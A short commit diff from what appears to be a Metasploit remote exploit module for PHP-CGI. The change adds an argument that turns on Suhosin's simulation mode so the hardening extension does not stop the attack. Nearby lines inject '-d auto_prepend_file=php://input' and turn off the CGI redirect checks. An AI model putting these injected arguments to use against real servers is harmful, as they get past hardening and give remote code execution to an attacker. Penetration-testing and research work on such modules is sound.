Take care of suhosin
parent
028d4d6077
commit
f3bcc9f23f
|
@ -116,6 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
create_arg("-d","auto_prepend_file=php://input"),
|
||||
create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
|
||||
create_arg("-d", "cgi.redirect_status_env=0"),
|
||||
create_arg("-d", "suhosin.simulation=#{rand_php_ini_true}"),
|
||||
rand_opt_equiv("-n")
|
||||
]
|
||||
|
||||
|
|
Loading…
Reference in New Issue